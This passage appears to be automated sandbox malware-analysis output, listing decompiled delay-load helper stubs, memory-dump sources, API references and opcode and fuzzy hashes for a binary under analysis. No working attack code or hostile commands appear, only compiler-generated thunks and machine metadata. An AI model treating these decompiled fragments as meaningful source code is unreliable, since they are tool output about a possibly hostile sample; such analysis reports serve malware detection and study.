                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 4eef3ea64cf2cab450ca091ace97df2e9059e539fc368b633711d6e467415d60
                                                                                                                • Instruction ID: 9c300cdad62400fbffe32a225db3a5633e9fd1efaea8b5b69f33a489148c92a8
                                                                                                                • Opcode Fuzzy Hash: 4eef3ea64cf2cab450ca091ace97df2e9059e539fc368b633711d6e467415d60
                                                                                                                • Instruction Fuzzy Hash: 8AB01295358182AD312451162E02C3A035CC3D4F10330E02FF900E9242D4901D061433
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A70, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A70() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26110); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 0fb2f205591bb31e0299d579b4eda6d281c31f66339e47e619ae7b3df38cbe59
                                                                                                                • Instruction ID: 67bb306e6e931a26a371a908c1f765932b76caf035f5e1da54401220aac73407
                                                                                                                • Opcode Fuzzy Hash: 0fb2f205591bb31e0299d579b4eda6d281c31f66339e47e619ae7b3df38cbe59
                                                                                                                • Instruction Fuzzy Hash: 76B012952581C26D313451162E03C3A034CD3D4F11330E42FF100F9282D8801D021033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A48, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A48() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26120); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 79cfd47f9a26cd3b0f9a0c21fe819c4be2a48506e905c1115507718a8a765200
                                                                                                                • Instruction ID: ff9f32e9a6a2c1c8b2ade959528471fa02350e387f7a25732f6f4cb6655fd63e
                                                                                                                • Opcode Fuzzy Hash: 79cfd47f9a26cd3b0f9a0c21fe819c4be2a48506e905c1115507718a8a765200
                                                                                                                • Instruction Fuzzy Hash: CAB012962581D66D312451162E02C3A038CD3D4F11330E12FF100E9246D4801D021033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A5C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A5C() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26118); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 8447d31f583e0f713437d7ba637a9ee5f7c45c32849f2b513b88ca5589905ccb
                                                                                                                • Instruction ID: ec9a651b58791054925f8e15edbc537c56b205ddb981a16d90348cab0f8b0280
                                                                                                                • Opcode Fuzzy Hash: 8447d31f583e0f713437d7ba637a9ee5f7c45c32849f2b513b88ca5589905ccb
                                                                                                                • Instruction Fuzzy Hash: BAB012952582826D31B451162E03C3A034CC3D4F10330E12FF100E9242D4801D421073
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A52, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A52() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf2611c); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 8abd069944a4869ec67c3aec824e439111a18540d2714d4a8de3a771b268f8f4
                                                                                                                • Instruction ID: d2d308a433267c3bd3728c3a4e62f42270847afec6ae9b47a304221cf1ec9038
                                                                                                                • Opcode Fuzzy Hash: 8abd069944a4869ec67c3aec824e439111a18540d2714d4a8de3a771b268f8f4
                                                                                                                • Instruction Fuzzy Hash: DFB01295258182AD313451162E03C3A034CC3D4F10330E02FF500E9242D4841D022033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A2A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A2A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf2612c); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 313c9a14db7a97930dd8542ac86fb17ad72ec80bf9e7596df5537077f78b6fbd
                                                                                                                • Instruction ID: 366544a7d152850290b2c69f0582ebe47d4905b9142ebcd1f657fdb135fd3c2e
                                                                                                                • Opcode Fuzzy Hash: 313c9a14db7a97930dd8542ac86fb17ad72ec80bf9e7596df5537077f78b6fbd
                                                                                                                • Instruction Fuzzy Hash: 61B01295258192AD316451262E02C3A038CC3D4F10330E02FF600E9242D4801D021033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A20() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26130); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: a51633b29b1383191141122e376e122d8d179425ab93947741dd13fbca04d5da
                                                                                                                • Instruction ID: a6a0e88bd12ec731286d3fc47464c1fbd11123471c482faaed9323e5f928d4bb
                                                                                                                • Opcode Fuzzy Hash: a51633b29b1383191141122e376e122d8d179425ab93947741dd13fbca04d5da
                                                                                                                • Instruction Fuzzy Hash: 3FB012952691C26D312451162E02C3A038CD7D4F11330E02FF101E9242D4841D121033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A16, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2A16() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef694, 0xf26134); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a05
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 32534d79bba0629f75fe71839e8d9ac99a944487ca0a88b98ca042141a0dad8d
                                                                                                                • Instruction ID: 85984e0529bceea8067f7344d4294c68a947369df9bdb467571f271946d13f19
                                                                                                                • Opcode Fuzzy Hash: 32534d79bba0629f75fe71839e8d9ac99a944487ca0a88b98ca042141a0dad8d
                                                                                                                • Instruction Fuzzy Hash: EAB0129525A1826D312452162F03C3A034CC3D4F10330E02FF101E9242D4841E131033
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C6B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2C6B() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef6b4, 0xf26034); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c14
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: 700b97d05a7860763276d6939228dd39581a8b98f783b4e52df2ff5fd49ff53f
                                                                                                                • Instruction ID: 89256003e39d4ef72d0b7ce57dcd158e9f1fe957de9276e9aa33ef762d456c9b
                                                                                                                • Opcode Fuzzy Hash: 700b97d05a7860763276d6939228dd39581a8b98f783b4e52df2ff5fd49ff53f
                                                                                                                • Instruction Fuzzy Hash: 17B0129226A1126D311892162E03C3A014CC1D0F51330E03FF200E5281E4844D433032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C43, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00ED2C43() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00ED304E(_t3, _t4, _t8, _t9, _t10, 0xeef6b4, 0xf26024); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c14
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: 28b61ef9dfbe259817f7763a91749395db1aa18e2d2cf5478e639db186254c79
                                                                                                                • Instruction ID: 29944c5d48183de521965059d67ef9d81ad7e69928830eba743d41fa6926b38b
                                                                                                                • Opcode Fuzzy Hash: 28b61ef9dfbe259817f7763a91749395db1aa18e2d2cf5478e639db186254c79
                                                                                                                • Instruction Fuzzy Hash: 1FB012A22681126D311892166E03C3A05CCC5D0F10330E03FF200E1281E4804D433032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2AED, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2AED() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 4d4409a062bdb1f64048226be5e9076640d57c98d541409608606ae694df0d4a
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: 4d4409a062bdb1f64048226be5e9076640d57c98d541409608606ae694df0d4a
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2AE3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2AE3() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 2e1624b2afa1cbfb3124f88384c05410666441651285533282bb28c7acca71b9
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: 2e1624b2afa1cbfb3124f88384c05410666441651285533282bb28c7acca71b9
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2AF7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2AF7() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
